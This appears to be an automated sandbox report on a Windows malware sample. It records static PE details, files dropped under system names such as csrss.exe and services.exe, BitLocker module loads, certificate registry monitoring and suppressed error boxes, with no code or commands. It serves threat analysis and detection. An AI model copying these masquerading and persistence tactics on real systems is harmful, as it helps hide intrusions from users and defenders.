Source: Vqzx4PFehn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Vqzx4PFehn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Vqzx4PFehn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Vqzx4PFehn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

File created: C:\portintosvc\__tmp_rar_sfx_access_check_6348156

Jump to behavior

Source: Vqzx4PFehn.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0101F640 push ecx; ret	0_2_0101F653
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0101EB78 push eax; ret	0_2_0101EB96
Source: C:\portintosvc\driverInto.exe	Code function: 4_2_00007FFD9BAC4B99 push ebp; retf	4_2_00007FFD9BAC4BA2
Source: C:\portintosvc\driverInto.exe	Code function: 4_2_00007FFD9BEBF167 push esi; ret	4_2_00007FFD9BEBF170
Source: C:\portintosvc\driverInto.exe	Code function: 4_2_00007FFD9BEBF10B push eax; ret	4_2_00007FFD9BEBF10C
Source: C:\portintosvc\driverInto.exe	Code function: 4_2_00007FFD9BEBF000 push edi; ret	4_2_00007FFD9BEBF001

Source: driverInto.exe.0.dr	Static PE information: section name: .text entropy: 7.542871166746595
Source: csrss.exe.4.dr	Static PE information: section name: .text entropy: 7.542871166746595
Source: services.exe.4.dr	Static PE information: section name: .text entropy: 7.542871166746595
Source: XXPWErhsUbDrk.exe.4.dr	Static PE information: section name: .text entropy: 7.542871166746595
Source: XXPWErhsUbDrk.exe0.4.dr	Static PE information: section name: .text entropy: 7.542871166746595
Source: XXPWErhsUbDrk.exe1.4.dr	Static PE information: section name: .text entropy: 7.542871166746595

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\portintosvc\driverInto.exe	File created: C:\Windows\Registration\csrss.exe			Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Program Files (x86)\Windows Defender\services.exe			Jump to dropped file

Source: C:\portintosvc\driverInto.exe	File created: C:\Recovery\XXPWErhsUbDrk.exe	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File created: C:\Users\user\Desktop\nntxgNlb.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Users\user\Desktop\cvopZsny.log	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File created: C:\Users\user\Desktop\fJkHwTWu.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Windows\Registration\csrss.exe	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Program Files (x86)\Windows Defender\services.exe	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File created: C:\Users\user\Desktop\VaRrMrQM.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Users\user\Desktop\uCFUtfTN.log	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File created: C:\Users\user\Desktop\TQvqMYlM.log	Jump to dropped file
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	File created: C:\portintosvc\driverInto.exe	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Users\user\Desktop\DtICHrzA.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Users\user\Desktop\SHKzphsQ.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Users\user\Desktop\EqkKdrOv.log	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File created: C:\Users\user\Desktop\mqRpKNWg.log	Jump to dropped file

Source: C:\portintosvc\driverInto.exe

File created: C:\Windows\Registration\csrss.exe

Jump to dropped file

Source: C:\portintosvc\driverInto.exe	File created: C:\Users\user\Desktop\DtICHrzA.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Users\user\Desktop\EqkKdrOv.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Users\user\Desktop\uCFUtfTN.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Users\user\Desktop\cvopZsny.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	File created: C:\Users\user\Desktop\SHKzphsQ.log	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File created: C:\Users\user\Desktop\mqRpKNWg.log	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File created: C:\Users\user\Desktop\nntxgNlb.log	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File created: C:\Users\user\Desktop\fJkHwTWu.log	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File created: C:\Users\user\Desktop\VaRrMrQM.log	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File created: C:\Users\user\Desktop\TQvqMYlM.log	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\portintosvc\driverInto.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\portintosvc\driverInto.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
